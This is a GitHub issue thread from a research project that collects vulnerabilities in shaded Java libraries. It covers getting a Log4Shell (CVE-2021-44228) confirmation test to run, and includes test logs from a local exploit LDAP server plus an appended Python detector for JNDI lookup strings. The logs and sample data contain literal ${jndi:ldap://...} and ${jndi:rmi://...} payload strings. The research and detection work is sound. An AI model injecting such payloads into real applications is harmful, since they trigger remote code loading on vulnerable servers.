jensdietrich / xshady

vulnerabilities found in shaded projects
Apache License 2.0

CVE-2021-44228 test should succeed on vulnerable artifacts but fails for an irrelevant reason #22

Closed wtwhite closed 12 months ago

wtwhite commented 12 months ago

See https://github.com/jensdietrich/shadedetector/issues/36#issuecomment-1728681909.

The upshot is that my run-script generator auto-senses testSignalWhenVulnerable to be failure instead of success, resulting in clones being missed.

wtwhite commented 12 months ago

Running java -jar dodgy-ldap-server.jar as root causes the test to succeed on the vulnerable artifact, as intended.

Next: See whether specifying a >1024 port number on both sides gets this working outside of root.

wtwhite commented 12 months ago

mvn clean test now works as expected in my Linux VM, but hung at the following point (after successfully creating foo and reporting test success) on piccolo:

--snip--
[INFO] -------------------------------------------------------
[INFO]  T E S T S
[INFO] -------------------------------------------------------
[INFO] Running ConfirmVulnerabilitiesTests
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] CONNECT conn=0 from="127.0.0.1:57124" to="127.0.0.1:9389"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND REQUEST conn=0 op=0 msgID=1 version=3 dn="" authType="SIMPLE"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND RESULT conn=0 op=0 msgID=1 resultCode=0 etime=1.042
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH REQUEST conn=0 op=1 msgID=2 base="exe" scope=0 filter="(objectClass=*)" attrs="ALL"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH RESULT conn=0 op=1 msgID=2 resultCode=34 diagnosticMessage="Unable to perform the search because an error occurred while attempting to parse base DN 'exe':  The provided string could not be decoded as a DN because no equal sign was found after the RDN attribute 'exe'." etime=5.901 entriesReturned=0
java.lang.NullPointerException
    at Exploit$OperationInterceptor.sendExeResult(Exploit.java:75)
    at Exploit$OperationInterceptor.processSearchResult(Exploit.java:62)
    at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
    at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
    at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
16:30:11.009 [main] ERROR ConfirmVulnerabilitiesTests - ${jndi:ldap://127.0.0.1:9389/exe}
[INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6.498 s - in ConfirmVulnerabilitiesTests

I suspect running the exploit triggered an intrusion detection system on piccolo. I have emailed ECS to let them know, and ask for an exemption. Leaving the issue closed for now.
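As an added example (not code from the xshady project or from the issue author), here is the kind of log check a defender on a shared host like the one described above would want: it scans application log lines for the JNDI lookup string that appears in the Maven output (`${jndi:ldap://127.0.0.1:9389/exe}`), extracts the callback scheme, host and port, and separates loopback callbacks (what a local vulnerability-confirmation test produces) from callbacks to remote hosts, which are the ones worth an alert. The sample log lines, the `find_jndi_lookups` and `classify_callback` names, and the `10.0.0.5` address are constructed for this example; only the first sample line mirrors the page.

```python
import ipaddress
import re

# Constructed sample log, modelled on the ERROR line in the issue's Maven
# output plus three made-up lines (one remote callback, two benign lookups).
SAMPLE_LOG = """\
16:30:11.009 [main] ERROR ConfirmVulnerabilitiesTests - ${jndi:ldap://127.0.0.1:9389/exe}
16:30:12.100 [main] INFO  ConfirmVulnerabilitiesTests - test completed
16:30:13.250 [http-1] WARN  RequestLogger - User-Agent: ${jndi:rmi://10.0.0.5:1099/a}
16:30:14.000 [main] INFO  Startup - config loaded from ${env:HOME}/app.conf
"""

# Matches the plain "${jndi:<scheme>://<host>[:<port>][/<path>]}" form.
# Obfuscated variants (nested lookups etc.) need additional patterns; this
# example deliberately covers only the literal form seen on the page.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://"
    r"(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?",
    re.IGNORECASE,
)


def find_jndi_lookups(log_text):
    """Return one dict per JNDI lookup string found in log_text."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in JNDI_RE.finditer(line):
            hits.append({
                "line": lineno,
                "scheme": m["scheme"].lower(),
                "host": m["host"],
                "port": int(m["port"]) if m["port"] else None,
                "path": m["path"] or "",
            })
    return hits


def classify_callback(hit):
    """'loopback' for callbacks to the local host (e.g. a vulnerability test
    harness running its own LDAP server), 'remote' for anything else.
    Hostnames that are not IP literals are treated as remote."""
    try:
        addr = ipaddress.ip_address(hit["host"])
    except ValueError:
        return "remote"
    return "loopback" if addr.is_loopback else "remote"


def triage(log_text):
    """Pair each hit with its classification; 'remote' entries are the ones
    an analyst should escalate, 'loopback' ones are worth noting but are the
    expected footprint of a local CVE-2021-44228 confirmation test."""
    return [(hit, classify_callback(hit)) for hit in find_jndi_lookups(log_text)]


if __name__ == "__main__":
    for hit, verdict in triage(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']}://{hit['host']}:{hit['port']}"
              f"{hit['path']} -> {verdict}")
```

Run against a real log, the loopback/remote split is what lets a monitoring rule stay quiet for a deliberate local test (the run above connects to 127.0.0.1:9389) while still flagging a lookup that points at an outside host.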